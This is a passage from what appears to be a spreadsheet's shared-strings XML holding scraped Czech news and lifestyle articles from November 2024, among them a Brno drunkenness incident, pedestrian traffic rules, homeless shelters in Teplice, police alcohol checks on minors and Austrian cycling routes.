    <t>474</t>
  </si>
  <si>
    <t>20241101_247_3243419180_741097d9f3bbd7cb2a0f.html</t>
  </si>
  <si>
    <t>741097d9f3bbd7cb2a0f</t>
  </si>
  <si>
    <t>Na opilce sotva stačil tester, napodruhé ohromená hlídka naměřila přes pět promile</t>
  </si>
  <si>
    <t>Na opilce sotva stačil tester, napodruhé ohromená hlídka naměřila přes pět promile 1. listopadu 2024 12:02 Do situace, se kterou se při své práci ještě nikdy nesetkali, přivedl ve čtvrtek v poledne dva brněnské strážníky silně opilý muž. Při dechové zkoušce totiž přístroj po prvním pokusu ukázal, že tak vysokou hodnotu ani nedokáže změřit. Jeho technické maximum se přitom pohybuje okolo šesti promile. Větší foto Ilustrační snímek | foto: Lukáš Bíba , MAFRA Po chvíli nechala hlídka čtyřiapadesátiletého muže do alkoholtesteru dýchnout znovu. Tentokrát už přístroj reagoval, ukázal extrémní hodnotu 5,38 promile. „Pro nenavyklého člověka může být i smrtelná,“ upozornil mluvčí městské policie Jakub Ghanem. U sebe měl opilec téměř prázdnou láhev vodky, což zřejmě nebyl jediný alkohol , který vypil. Po celou dobu s ním bylo složité mluvit. Během čekání na druhý pokus dechové zkoušky strážníci přivolali záchrannou službu. Zdravotníci si pak muže převzali a po ošetření ho převezli do nemocnice. To bude 3,5 promile, tušil správně řidič. Takto opilý vyrazil na večerní nákup „Navíc je podezřelý z porušení takzvaného tabákového zákona, protože se v tomto stavu zdržoval na nástupišti hromadné dopravy. Ve správním řízení mu hrozí pokuta do dvaceti tisíc korun,“ uvedl mluvčí. Na strážníky se kvůli opilci obrátila řidička dopravního podniku, muž se v silně podroušeném stavu povaloval u kolejí na tramvajové smyčce v Řečkovicích . I když ho s pomocí cestujícího odtáhla dál od trati, bála se, že by mohl ohrozit svůj život, kdyby se vrátil zpátky. 11. října 2024 Autor: Oldřich Haluza Autor Oldřich Haluza</t>
  </si>
  <si>
    <t>20241101_248_3243411137_4b659610dfd7420dfd76.html</t>
  </si>
  <si>
    <t>4b659610dfd7420dfd76</t>
  </si>
  <si>
    <t>Na opilce sotva stačil tester, napodruhé ohromená hlídka naměřila přes pět promile Do situace, se kterou se při své práci ještě nikdy nesetkali, přivedl ve čtvrtek v poledne dva brněnské strážníky silně opilý muž. Při dechové zkoušce totiž přístroj po prvním pokusu ukázal, že tak vysokou hodnotu ani nedokáže změřit. Jeho technické maximum se přitom pohybuje okolo šesti promile. Po chvíli nechala hlídka čtyřiapadesátiletého muže do alkoholtesteru dýchnout znovu. Tentokrát už přístroj reagoval, ukázal extrémní hodnotu 5,38 promile. „Pro nenavyklého člověka může být i smrtelná,“ upozornil mluvčí městské policie Jakub Ghanem. U sebe měl opilec téměř prázdnou láhev vodky, což zřejmě nebyl jediný alkohol , který vypil. Po celou dobu s ním bylo složité mluvit. Během čekání na druhý pokus dechové zkoušky strážníci přivolali záchrannou službu. Zdravotníci si pak muže převzali a po ošetření ho převezli do nemocnice. To bude 3,5 promile, tušil správně řidič. Takto opilý vyrazil na večerní nákup „Navíc je podezřelý z porušení takzvaného tabákového zákona, protože se v tomto stavu zdržoval na nástupišti hromadné dopravy. Ve správním řízení mu hrozí pokuta do dvaceti tisíc korun,“ uvedl mluvčí. Na strážníky se kvůli opilci obrátila řidička dopravního podniku, muž se v silně podroušeném stavu povaloval u kolejí na tramvajové smyčce v Řečkovicích . I když ho s pomocí cestujícího odtáhla dál od trati, bála se, že by mohl ohrozit svůj život, kdyby se vrátil zpátky. 11. října 2024 KRIMI Sledovat další díly na iDNES.tv Autor: uza, Oldřich Haluza Autoři person uza person Oldřich Haluza Rubrika transition_slide Rádio Impuls - Jihomoravský kraj</t>
  </si>
  <si>
    <t>16650</t>
  </si>
  <si>
    <t>7810</t>
  </si>
  <si>
    <t>20241101_249_3243433712_d4c321690e25bed27256.html</t>
  </si>
  <si>
    <t>d4c321690e25bed27256</t>
  </si>
  <si>
    <t>Chodci na silnicích: Levá, nebo pravá strana? Pravidla, která musí znát každý VIDEO: Chybující chodci Povinnosti chodce Kola a vozíky A co in-line bruslaři? Pěšky šel někdy po silnici snad každý. A chodí se vlevo, nebo vpravo? Otázka, na kterou neznají odpověď všichni, o čem se mohou řidiči v provozu často snadno přesvědčit. Proto si to pojďme zopakovat. Kdo je chodec a jaké má má povinnosti? Podle platné legislativy je chodcem nejen ten, kdo jde běžnou chůzí po komunikaci, ale také ten, kdo tlačí nebo táhne sáňky, dětský kočárek, vozík pro invalidy nebo ruční vozík, pohybuje se na lyžích nebo kolečkových bruslích anebo pomocí ručního nebo motorového vozíku pro invalidy, vede jízdní kolo, motocykl o objemu válců do 50 cm 3 , psa a podobně. | Video: Youtube Povinnosti chodce Chodci by se měli na pozemních komunikacích pohybovat (pokud nejsou na chodníku nebo ztezce pro chodce) vždy jen na správné straně vozovky. Kde není chodník, nebo je‐li neschůdný, chodí se po levé krajnici. Pokud krajnice chybí nebo je neschůdná, chodí se co nejblíže při levém okraji vozovky. V takovém případě mohou jít maximálně dva chodci vedle sebe (jednotlivě pak za snížené viditelnosti, při zvýšeném provozu a v nebezpečných a nepřehledných úsecích). Jsou však i místa, kam chodec vstoupit vůbec nesmí. Patří mezi ně dálnice, silnici pro motorová vozidla a místa za značkou Zákaz vstupu chodců. Řidiči se mohou setkat na silnicích také s organizovaným útvarem chodců. Ten musí jít vpravo (a pokud tomu nebrání zvláštní okolnosti, při pravém okraji vozovky) a musí být za snížené viditelnosti označen vpředu po obou stranách neoslňujícím bílým světlem a vzadu po obou stranách neoslňujícím červeným světlem. Označení světly může být nahrazeno oděvními doplňky s označením z retroreflexního materiálu. Nahrává se anketa ... Pokud je blíže než 50 metrů křižovatka s řízeným provozem , přechod pro chodce, místo pro přecházení vozovky, nadchod nebo podchod vyznačený dopravní značkou "„Přechod pro chodce“, „Podchod nebo nadchod“, musí chodec přecházet jen na těchto místech. Na přechodu pro chodce se chodí vpravo. Mimo přechod pro chodce je dovoleno přecházet vozovku jen kolmo k její ose. Chodec smí přecházet vozovku, jen pokud s ohledem na vzdálenost a rychlost jízdy přijíždějících vozidel nedonutí jejich řidiče k náhlé změně směru nebo rychlosti jízdy. Jakmile vstoupí chodec na přechod pro chodce nebo na vozovku, nesmí se tam bezdůvodně zastavovat nebo zdržovat. Život řidiče Také nesmí vstupovat na přechod pro chodce nebo na vozovku, pokud přijíždějí vozidla s právem přednostní jízdy. Důležité je také upozornit, že chodec nemá na přechodu pro chodce absolutní přednost a nesmí vstupovat na přechod pro chodce nebo na vozovku bezprostředně před blížícím se vozidlem. Zároveň musí dát přednost tramvaji. Před vstupem na vozovku se chodec musí přesvědčit, jestli může vozovku přejít, aniž by ohrozil sebe i ostatní účastníky provozu. Kola a vozíky Jestliže chodec vede kolo po chodníku, neměl by jím ohrožovat okolní chodce. V takovém případě je lepší vést kolo blíž k vozovce, čímž zároveň chrání i sám sebe. Vede-li chodec kolo po silnici, pak jde po pravé krajnici nebo při pravém okraji vozovky. Kolo je přitom na straně blíže k vozovce. Při chůzi s kolem musí alespoň jedna ruka držet kolo za řídítka. Tímto způsobem je zajištěno přesné vedení kola, které tak nemůže například najetím na nerovnost náhle změnit směr jízdy a zkřížit tak dráhu jinému chodci nebo dokonce jedoucímu vozidlu. Život řidiče Tlačí-li nebo táhne-li chodec ruční vozík, jehož šířka není větší jak 60 cm, chodí stejně jako ostatní chodci buď vpravo na chodníku, po levé krajnici, nebo při levém okraji vozovky. U ručního vozíku, jehož šířka převyšuje 60 centimetrů, je situace jiná. Nejedná se už o chodce, ale o řidiče nemotorového vozidla. Takže pro něj platí všechna pravidla, jako pro řidiče. S takovým vozíkem nesmí jít po chodníku. Musí jít nejvíce při pravém okraji vozovky a nesmí být pod vlivem alkoholu . Takový ruční vozík musí být navíc vybaven červenými kulatými odrazkami vyznačujícími jeho obrysovou šířku. Pozor by si měli dát také pejskaři. Vodítko psa nesmí křížit pěší dráhu chodců. Při chůzi se psem na stezce pro chodce a cyklisty je vodítko v jízdní dráze cyklistů předpokladem vzniku nebezpečné nehody. A co in-line bruslaři? „I když se to může zdát paradoxní, jezdci na kolečkových in- line bruslích jsou podle ustanovení § 2 , písmeno j) zákona č. 361/2000 Sb., o provozu na pozemních komunikacích a o změnách některých zákonů ve znění pozdějších předpisů chodci. To znamená, že musí dodržovat všechny povinnosti dané tímto zákonem jak obecně všem účastníkům provozu na pozemních komunikacích (§ 4), tak i specifické povinnosti dané chodcům, a to v § 53 zákona 361/2000 Sb.,“ upozorňuje BESIP . tag Jak se vyhnout pokutám Život řidiče 18. 10. 2024 Život řidiče 11. 10. 2024 Život řidiče 9. 10. 2024 Život řidiče 27. 9. 2024 gallery 3 Zobrazit všechny Autor: Radim Šlezingr Autor person Radim Šlezingr</t>
  </si>
  <si>
    <t>20241101_25_3246579473_fb627dc3c78d57e520a6.html</t>
  </si>
  <si>
    <t>fb627dc3c78d57e520a6</t>
  </si>
  <si>
    <t>ČT24 Krátké zprávy</t>
  </si>
  <si>
    <t>ČT24 Krátké zprávy V Japonsku začal platit zákon ukládající vězení a pokuty cyklistům, kteří používají při jízdě mobilní telefon nebo jsou pod vlivem alkoholu .</t>
  </si>
  <si>
    <t>156380</t>
  </si>
  <si>
    <t>109160</t>
  </si>
  <si>
    <t>20241101_250_3243438891_d12a195ec250fb0cdda3.html</t>
  </si>
  <si>
    <t>d12a195ec250fb0cdda3</t>
  </si>
  <si>
    <t>Dcera se má vdávat, ale tohle asi nebude výhra!</t>
  </si>
  <si>
    <t>Dcera se má vdávat, ale tohle asi nebude výhra! Karla Pelikánová 1.11.2024 3 minuty čtení Moje dcera žije se Pepíkem už tři roky a chtějí se vzít. Jenže nedávno jsem zjistila, že její povedený přítel řádí na seznamkách jako ďas. S Pepíkem se naše Miluška poznala na diskotéce a oba měli pocit, že ten druhý je ten pravý. Dceři je třicet let. Nějaké vztahy už měla, ale nikdy jsem jí neviděla tak zamilovanou a šťastnou. Během čtyř měsíců oba pustili svoje pronájmy a našli si větší byt, aby byli spolu. Lovec žen? Jenže pak naše Miluška v počítači objevila, že má její Pepíček profil na nějaké seznamce. Zapomněl se odhlásit na počítači. Ona rozhodně nepatří mezi žárlivé ženské, které šmejdí partnerům ve věcech a projíždějí mobil.V tomhle směru není rozhodně po mně, já si vždycky svého chlapa uměla pohlídat. A taky mu udělat náležitou scénu, když o něco šlo. Ona ale byla vždycky moc hodná! Prostě mu věřila, a to byla chyba! Nejprve to číst nechtěla, jen mi zavolala, já ji ale přesvědčila. Díky mně tak zjistila, jak o sobě píše, že je svobodný, dokonce si ubral pět let. Prý hledá ženy jakéhokoli věku, svobodné i zadané, na nezávazný sex. Prý to byla sázka Když mi to dcera četla do telefonu, brečela. Byla v šoku. Nic mu říct nechtěla, já ji ale přesvědčila, ať na něho udeří. Aby šel s pravdou ven. Pepík ale dceři v klidu odpověděl, že to je prý jen sranda, on žádnou jinou ženskou nehledá. Jen se s kamarády vsadili, kdo získá víc odpovědí. Hrají takovou hru, vytvořili si profily a lákají ženy. A kdo bude mít nejvíc odpovědí, tak ten vyhraje basu piv . V první chvíli mu dcera nevěřila, přece není možné, aby dospělí chlapi, dva jsou dokonce otcové od rodin, měli takovou hloupou zábavu. A taky mu řekla, že nestojí o chlapa, který chodí na takovéto stránky, i když jen z legrace. U mě měla dcerka tu největší podporu. Jenže pak ji přešel vztek a zase mu začala věřit. U mě však důvěru její Pepan ztratil navždycky. Proč se vůbec baví tímto způsobem? Vždyť je to nefér i vůči těm ženám, co odpovídaly, a že jich nebylo málo. Pepík se ale snažil, jak mohl, aby se dcera na něj nezlobila. A ona mu odpustila. Jenže ve mně už to bylo. Miluše nesmí být tak naivní! Snažila jsem se dceru přesvědčit, aby byla ve střehu a nakonec se mi to povedlo. Byl zrovna ve vaně, když sáhla opět po jeho mobilu. A našla v něm intimní fotky nějaké ženy. Podívala se do odeslané pošty a byly tam i jeho fotky, stál svlečený v jejich ložnici. Naši Mílu popadl konečně takový vztek, že za ním letěla do koupelny, měl kliku, že byl už z vany venku, jinak by ho utopila. Musím zasáhnout! Řvala na něj, co to má znamenat? Křičela, ať táhne, ať si jde, když mu nestačí jen ona. Pepík ji přesvědčoval, že to byla opět nějaká stupidní legrace. Byl prý opilý, a když mu jedna z těch holek, co si s nimi psal na té seznamce, poslala fotky, tak se nechal kluky v hospodě ukecat a vyfotil se svlečený do půl těla a poslal jí taky fotku. Byl tak přesvědčivý, že mu ta naše husa zase uvěřila. A slíbil, že toho nechá. Blíží se termín svatby a já z toho nemám dobrý pocit. Pořád si říkám, že na to ta naše holka doplatí. A přísahám, že zeťovi budu takovou tchyní, jaká má podle pekelného řádu být! Pavla (52), Opava Předchozí článek Mám chuť od něho utéci… 7.11.2024 Je to hezký mužský, a kamarádky mi ho dokonce závidí. Na veřejnosti se usmívá a každému umí říct něco pěkného. Kdo by ho nemiloval? Já už ne! Vlastně ani děti netuší, jaký je jejich otec. Jak by taky mohly? Už spoustu let u nás nebydlí, a když občas přijdou na návštěvu, je jejich otec jako vyměněný. Učiněný idol mužů i žen v okolí. Dcera mi nerozuměla Párkrát jsem se snažila dceři něco na Kolegyni se hodily moje drobné 7.11.2024 Vždycky jsem měla plnou peněženku drobných a nevěděla, co s nimi. Potom mince začaly ubývat. Byla to záhada. Nakupovala jsem stále na stejném místě a taky celkem podobný sortiment. Přestože mi vždycky zbývalo hodně kovových mincí, nyní jsem jich měla v peněžence sotva pár. Samozřejmě mě napadlo, že někdo má moje podivné ztráty na svědomí, ale kdo? Viníka jsem hned nenašla První mě napadla Prodávala falešné čaje i krémy 6.11.2024 Bylinkářka, která se nedávno přistěhovala do našeho města, měla výbornou pověst. Prý dokáže pomoct každému, kdo to potřebuje. Byla to taková sympatická ženská, ale budila respekt. Když jsem se k ní konečně dostala na řadu, beze slova jsem zaplatila spoustu peněz, jen abych od ní získala ty její zázraky. Nějaké odmlouvání nebo diskuse nebyla možná. Prostě se mi podívala do očí a taky na jazyk, k Teď už nastal čas pomsty… 6.11.2024 Pozvánka na sraz spolužáků po čtyřiceti letech ve mně vyvolala ty nejhorší vzpomínky. Ve třídě mě všichni měli za otloukánka a šeredu. Nejhorší bylo, že rodiče o tom nechtěli ani slyšet. Prý musím něco vydržet! Bylo to k nevydržení a nikde jsem neměla zastání. Ve škole mě zatím oslovovali: Ty šeredo! a já si na to opravdu zvykla. Někdy jsem si říkala, že to snad ani nikdo z nich nemyslí vážně, Lásku mi předpověděla věštkyně 5.11.2024 Nebyla jsem ten typ ženy, která věří, že její osud je napsán v horoskopu nebo že jí karty ukážou cestu. Nikdy jsem nebyla ošklivé káčátko. Patřila jsem mezi průměrně hezké dívky a o nápadníky jsem neměla nouzi. Přesto mé vztahy neměly příliš dlouhého trvání, a pokud ano, tak spíš nikam nevedly. Když už mi bylo přes 30 let, začala jsem být nervózní, protože jsem logicky toužila po dětech a úplné Autor: Karla Pelikánová Autor person Karla Pelikánová Rubrika transition_slide Neuvěřitelný život</t>
  </si>
  <si>
    <t>28</t>
  </si>
  <si>
    <t>12</t>
  </si>
  <si>
    <t>20241101_251_3244235574_d3e938bbc84490ce3d0e.html</t>
  </si>
  <si>
    <t>d3e938bbc84490ce3d0e</t>
  </si>
  <si>
    <t>Teplice myslí na bezdomovce. Mají pro ně vytápěné stany</t>
  </si>
  <si>
    <t>Teplice myslí na bezdomovce. Mají pro ně vytápěné stany Simona Knotková Zdroj: Armáda spásy Lidé bez přístřeší v Teplicích se mohou od pátku přijít vyspat do vytápěných stanů u sídla kontaktního a poradenského centra White Light. Je v nich 15 míst a je už několik zájemců. Bezdomovec Ivan řekl, že si přeje, aby mu spaní v teple v pátek v noci vyšlo. Pro svou nedočkavost přišel už před několika dny, přinesl si i deku a polštář. Stany tou dobou ještě nebyly připravené, také v pátek se dodělávají poslední detaily, řekl vedoucí kontaktního centra a terénních programů Oto Kovanda. White Light provozuje kontaktní centrum, terénní programy a ambulanci pro léčbu závislostí. Do kontaktního centra přijde za rok okolo 400 klientů, terénní program využívá 200 lidí. „My samozřejmě máme nějaké klienty, o kterých víme, kteří sem zřejmě přijdou. Další klienti budou z nízkoprahového centra Květina a naši terénní pracovníci rozdávají letáky po městě,“ uvedl Kovanda. Ve zkušebním režimu bude přespávání ve stanech fungovat zhruba dva týdny. Vedoucí řekl, že při velkém zájmu budou dostávat přednost ženy, starší lidé a handicapovaní. Až klesnou teploty pod minus pět stupňů Celsia, zřídí White Light i Květina tzv. krizové židle. Lidé bez domova na nich budou moci trávit noc uvnitř, kapacita se tak zvýší o dalších 18 míst. Větší stan pojme až 15 lidí. Kdyby některý z klientů chtěl spát odděleně, protože si sebou přivede například psa, bude mu to umožněno v menším stanu. Noc ve stanu mohou trávit osoby bez přístřeší a musejí být schopny dodržovat pravidla. „Podmínkou je, aby se ten člověk choval přijatelně. Nemusí to být tak, že bude úplně čistý. Nikdo nebude dělat žádné testy na drogy a na alkohol ,“ doplnil Kovanda. Lidé mohou přicházet od 19:30 do 22:00, pracovníci je budou budit kolem půl sedmé ráno. „Dáme jim nějakou kávu a čaj, možná nějakou sušenku,“ řekl vedoucí. Stany budou u sídla centra do března. Ve stanech jsou palety pokryté krabicemi a kobercem. White Light zažádalo na městě o polní lůžka, kterými doplní prostory později. Spacáky, polštáře a deky mohou mít klienti vlastní, centrum má ale také několik erárních. Rubrika transition_slide Ústecký kraj</t>
  </si>
  <si>
    <t>20241101_252_3243409051_70c289cf1819f88330f7.html</t>
  </si>
  <si>
    <t>70c289cf1819f88330f7</t>
  </si>
  <si>
    <t>Policisté kontrolovali opilé děti. Předávali je rodičům</t>
  </si>
  <si>
    <t>Policisté kontrolovali opilé děti. Předávali je rodičům Policisté kontrolovali dodržování zákazu nabídky, prodeje nebo podávání alkoholu osobám mladším osmnácti let. Hlídky policie zkontrolovaly celkem 107 mladistvých a 16 nezletilých, hlavně ve venkovních prostorách, ale i v restauracích a barech na Blanensku . Kontrolní akce podle policie opět prokázala prodej alkoholu mladistvým. „Ve středu ve večerních hodinách se na Blanensku uskutečnila policejní akce s názvem Mládež. Do akce bylo nasazeno několik desítek policistů služby pořádkové a kriminální policie ÚO PČR Blansko, jedenáct příslušníků Celní správy, osm strážníků MP Blansko, Letovice , Boskovice , Velké Opatovice a pracovnice Krajské hygienické stanice Jihomoravského kraje,“ popsala policejní mluvčí Lenka Petrželková . Kontrolní hlídky se zaměřily na dodržování zákazu nabídky, prodeje nebo podávání alkoholu osobám mladším osmnácti let v hospodách, restauracích a barech, ale i na konzumaci alkoholu mladistvými venku. Policie zkontrolovala celkem 123 osob mladších 18 let, z toho 107 mladistvých a 16 nezletilých. „V devíti případech bylo zjištěno požití alkoholu u osob mladistvých v rozmezí od 0,11 do 1,15 promile alkoholu v dechu a v jednom případě u osoby nezletilé ve výši 0,38 promile alkoholu . Celkem bylo zjištěno osm protiprávních jednání, z toho sedm přestupků a jeden trestný čin. Nezletilé osoby pod vlivem alkoholu byly předány zákonným zástupcům,“ popsala mluvčí. Policie kontroly bere jako prevenci a ochranu zdraví mladistvých, která je důležitou součástí boje proti alkoholu a návykovým látkám. „Proto takové kontrolní akce lze hodnotit jako prospěšné a užitečné a v budoucnu se počítá s dalšími podobnými kontrolami,“ uzavřela Petrželková. Autor: external Rubrika transition_slide Krimi</t>
  </si>
  <si>
    <t>19220</t>
  </si>
  <si>
    <t>19410</t>
  </si>
  <si>
    <t>20241101_253_3462861749_e4c3616e37443e995b11.html</t>
  </si>
  <si>
    <t>e4c3616e37443e995b11</t>
  </si>
  <si>
    <t>Relaxujte pohybem na dovolené v Rakousku</t>
  </si>
  <si>
    <t>Relaxujte pohybem na dovolené v Rakousku Altmünster, Rakousko • Zdroj: Photo by Martin Buchbauer on Unsplash Markéta Pušová Cestování Víte, kde najdete spojení pohybu, relaxace a přírody? V Rakousku . V zemi, kde se harmonie s přírodou stává životním stylem a kde najdete klid pro své tělo i mysl. Představte si, jak se projíždíte po cyklostezce podél Dunaje nebo kroužíte kolem třpytivých jezer a necháváte se unášet vůní rozkvetlých luk. Právě jízda na kole je jedním z nejlepších způsobů, jak objevit jedinečné rakouské regiony. Připravte se na dobrodružství plné relaxace, pohody a objevování nových krásných míst, přinášíme vám tipy na nejlepší cyklostezky v Rakousku . Trasu si vyberete podle svých možností a chuti – od relaxačních, rovinatých tras až po výzvy s pořádným převýšením. Rakousko má co nabídnout každému cyklistovi a čeká vás s otevřenou náručí, tak neváhejte a vydejte se na cestu za skvělými zážitky a nalezením duševní rovnováhy. Reklama Na kole podél Dunaje Nezapomenutelnou jízdu zažijete na vyhlášené Podunajské cyklostezce, která se svou délkou 330 kilometrů protíná dvě spolkové země, Horní a Dolní Rakousko , a je rozdělená do 17 etap. Start: Horní Rakousko Trasa začíná v Pasově , svůj výlet však můžete odstartovat už v hornorakouském městě Schärding am Inn s historickým centrem. Po Innské cyklostezce se dostanete do Pasova , odkud vás při cestě již bude doprovázet Dunaj . Dovede vás až do Schlögenu a dále do Lince. Po cestě už z dálky uvidíte věž soukromého hradu Neuhaus. Navštívit můžete také hrady Mühldorf nebo ten místní v Linci. Z Lince pak vede trasa do Ardaggeru , která vám zabere přibližně tři hodiny. Pokud se během výletu rádi zchladíte a zaplavete si, potěší vás možnost koupání v některém z mnoha jezer po cestě. Jinou formu osvěžení vám přinese tradiční hruškový cider z Mostviertelu. Odsud již vjíždíte do spolkové země Dolní Rakousko . Po příjezdu do Ardaggeru si můžete dopřát odpočinek v klidném prostředí tohoto malebného města. Reklama Dolní Rakousko Následující úsek začnete tentokrát v Dolním Rakousku , kde vás na Podunajské stezce čekají další kilometry. Po cestě narazíte na městečko Ybbs , kde si můžete udělat zastávku v muzeu cyklistiky. Středně obtížná trasa o délce přibližně tři a půl hodiny vás zavede také do malebného města Melk , které je západní vstupní branou do oblasti Wachau . Toto malé, ale významné údolí je světovým dědictvím UNESCO a je známé svými výbornými víny. V červenci zde můžete zažít sklizeň wachauských meruněk, vůbec nejsladšího druhu, jaký lze ochutnat. Na trase vás okouzlí také středověké městečko Dürnstein, jedno z nejkrásnějších v údolí Wachau . Auta sem jen tak nesmějí, což podtrhuje místní historickou atmosféru. Navštívit můžete zříceninu hradu a potěší vás krásný výhled na bývalý klášter, vystupující přímo ze břehu Dunaje , který upoutá pozornost svou modře zbarvenou věží. Z Melku pokračuje stezka k Mauternu , skrz Dunkelsteinerwaldský les, největší souvislou zalesněnou plochu ve střední Evropě . Kultura všude kolem Poblíž vesnice Bacharnsdorf si všimněte zbytků opevnění, které zde vybudovali Římané. Od Mauternu následuje šestý úsek trasy, který vás zavede do Klosterneuburgu . Zde doporučujeme navštívit místní klášter, který vás ohromí svou architektonickou krásou a úchvatným vnitřním zdobením. Na cestě nesmíte minout ani historický Tulln a jeho 70 výstavních bio zahrad, kde se pěstují plodiny bez pesticidů a hnojiv. Zdejší promenády a piknikové louky vám poskytnou nespočet míst pro romantické zážitky. Navštívit můžete i Muzeum Egona Schieleho , významného rakouského malíře pocházejícího právě z Tullnu . Další etapa stezky pak vede přímo přes Vídeň , odkud můžete pokračovat až do Bratislavy . Alpe Adria - průvodce nejen Korutany Že je nemožné přejet po jedné cyklostezce z Rakouska do Itálie až k Jaderskému moři? Alpe Adria vás vyvede z omylu. Tato cyklostezka vede od hlavního města spolkové země Salcbursko přes Korutany až po italské městečko Grado na břehu Jaderského moře . Celá trasa je dlouhá 410 kilometrů a je rozdělená do 8 etap – jedna etapa na jeden den. Jede se hlavně po asfaltu či jemném štěrku. Jedná se o jednu z nejatraktivnějších cyklistických spojnic v celé Evropě . Alpe Adria, Rakousko | Photo by Nagarjun Kogaravalli Sathyanarayana on Unsplash Putování po stezce Alpe Adria můžete začít v Korutanech v Mallnitzu, odkud se vydáte do údolí Seebachtal s křišťálově čistým jezerem uprostřed nespoutané přírody. Když budete projíždět Obervellachem, přivítá vás mocné hučení místních vodopádů, u kterých se vyplatí přibrzdit. Historické skvosty a relaxace Srdce nadšenců do historie zaplesá při projížďce pod zříceninou Landskron , kde se pořádají přehlídky sokolnictví. Pokud nejste fanoušky sokolů, můžete navštívit v blízkém opičím parku makaky, kteří sem byli dovezeni z Japonska . Díky podobným klimatickým podmínkám zde můžou makakové bez problémů žít a návštěvníci je pozorují v jejich přirozeném prostředí. Své síly můžete doplnit ve Villachu , městě, kde má lázeňství dlouhodobou tradici. Nacházejí se zde největší lázně v Korutanech , dokonce i největší hammam lázně v Rakousku . Po přejetí hranic s Itálií se můžete těšit na líbezné Udine a v městečku Grado si již můžete pochutnat na italské zmrzlině na písečné pláži u moře. Salcbursko po Taurské cyklostezce Taurská cyklostezka vede po nefrekventovaných vedlejších silnicích podél kulturních míst a největších rakouských řek přes Salcbursko a Horní Rakousko . Tato prožitková trasa vhodná pro rodiny vás potěší možnostmi ubytování v hotelech či penzionech, kterých je podél cesty více než 50. Trasa, která své jméno získala od pohoří Hohe Tauern (Vysoké Taury), vede 300kilometrovým údolím podél řek Salzach , Saalach a Inn. Uvolněte se při jízdě po rovinách v krásném prostředí, nechte se udivit ohromujícími Krimmelskými vodopády a dopřejte si pocit klidu a rovnováhy. Na cestě se nachází mnoho dalších kouzelných míst, jako je pohoří Vysoké Taury , město Salcburk či solné doly Hallein – Bad Dürrnberg. Ledové osvěžení Chcete-li zažít pravé ledové osvěžení, ponořte si po cestě nohy do Zellského jezera. Málokdo tuší, že naši rakouští sousedé se můžou pyšnit největší ledovou jeskyní na světě, kterou tu můžete navštívit. Nejlepší je rozdělit si cyklostezku na několik etap a navštívit, co regiony po cestě nabízejí. Cyklostezka kolem Neziderského jezera v Burgenlandu Nejoblíbenější cyklostezka v Burgenlandu se vine kolem Neziderského jezera. Na 117,5 kilometru trasy, která vás provede v blízkosti břehů, objevíte vesničky, rozsáhlé rákosiny a bohatou flóru a faunu. Odskočíte si dokonce i do Maďarska , kudy vede 41,5 kilometru trasy. Neziderské jezero vzniklo před dvěma miliony let tektonickou činností a postupným vysušováním původního moře. Díky tomu se v menších jezírkách v okolí nachází sůl a tímto unikátním elementem je ovlivněno i pěstování vína . Neziderské jezero | Photo by Arno Senoner on Unsplash Stezka se nachází v národním parku Neusiedler See – Seewinkel, což znamená, že máte možnost objevovat rozmanitou faunu a flóru této oblasti. Okolní příroda je dokonce chráněna organizací UNESCO. Cyklostezka je ideální volbou pro rekreační cyklisty. Minimální stoupání a skvělý povrch ocení rodiny s dětmi i ti, kteří si chtějí užít odpočinkovou jízdu. Podél cesty jsou dřevěné vyhlídky, kde se můžete zastavit, pokochat se okolním prostředím a načerpat síly na další úsek. Narazíte taky na malebné vesničky s nespočtem restaurací, kde se můžete posilnit místními specialitami před další cestou. Užijete si pohodovou jízdu v osvěžujícím okolí krásného jezera, s výhledy na rozsáhlé rákosiny a chutným občerstvením. Tyrolsko na kole regionem Ausserfern Region Ausserfern láká cyklisty na malebné cyklostezky, přírodu plnou jezer a divokou řeku. A procházka po železném lanovém mostě na hrad Ehrenberg vám určitě zvýší hladinu adrenalinu. Jednou z nejvýraznějších zvláštností tohoto tyrolského regionu je řeka Lech, považovaná za jedinou divokou řeku v Evropě , která se klikatí podél německo-rakouské hranice od hory Zugspitze až po Lech. Pro cyklisty nabízí region Ausserfern širokou škálu tras, které se mění ze štěrkových cest na asfaltové stezky a jsou ideální pro gravel biking, nový trend na cyklistické scéně. V samotném srdci horské krajiny leží 18 vyznačených cyklostezek právě pro gravel biking, které nabízejí více než 1000 km dobrodružství s celkovým převýšením 22 000 metrů. Jednou z nejzajímavějších atrakcí je pak železný lanový most dlouhý 406 m, který visí nad silnicí bez jakékoli fi xace ve výšce 115 m a vede na hrad Ehrenberg . Procházka přes most je nezapomenutelným zážitkem. Po cestě můžete najít ubytování v 58 cyklistických hotelech, které jsou ideální pro odpočinek a občerstvení po náročném dni na kole. Navštivte Tyrolsko a objevte krásy regionu Ausserfern na vlastní kůži. Hrad Ehrenberg | Photo by Alin Andersen on Unsplash Murská cyklostezka ve Štýrsku Tato kouzelná cyklostezka vás zavede z rakouského Štýrska až do Slovinska , 453 kilometry v osmi nezapomenutelných etapách. Od pramene ve Vysokých Taurách projedete 359 km po Rakousku až do města Bad Radkersburg a následně do chorvatského Legradu , kde se Mura vlévá do Drávy . Trasu můžete začít nebo skončit kdykoli a rozdělit si ji na několik výletů. Krajina plná překvapení Jedinečnost Murské cyklostezky spočívá v její rozmanitosti. Po cestě potkáte přes 200 druhů ptactva, starobylé statky, impozantní hory a Štýrský Hradec , jehož historické centrum je zapsané na seznamu světového kulturního dědictví UNESCO. Na konci vašeho putování na vás čeká region známý tradičním vínem a termálními lázněmi. Voda se po cestě objevuje ve všech podobách, od možnosti odpočinku přímo u řeky Mury přes osvěžující jezera až po krápníkové jeskyně a soutěsky. Zajímavé zastávky K několika zajímavým místům, která vás po cestě čekají, patří termální lázně v Bad Radkersburgu . V mikroregionu Zirbenland pak roste Zirbe, v překladu borovice, která je výjimečná pro své léčivé účinky a vyrábí se z ní sirup, likér, šnaps a vonné oleje. "Článek vyšel v časopisu Moje psychologie 6/2024" Autor: Markéta Pušová Autor person Markéta Pušová</t>
  </si>
  <si>
    <t>381</t>
  </si>
  <si>
    <t>20241101_254_3243486480_62439ea47ef718338406.html</t>
  </si>
  <si>
    <t>62439ea47ef718338406</t>
  </si>
  <si>
    <t>Z bývalé čekárny pro cestující 1. třídy je kavárna s čajem o páté. V secesních prostorech se budete cítit jako na zámku</t>
  </si>
  <si>
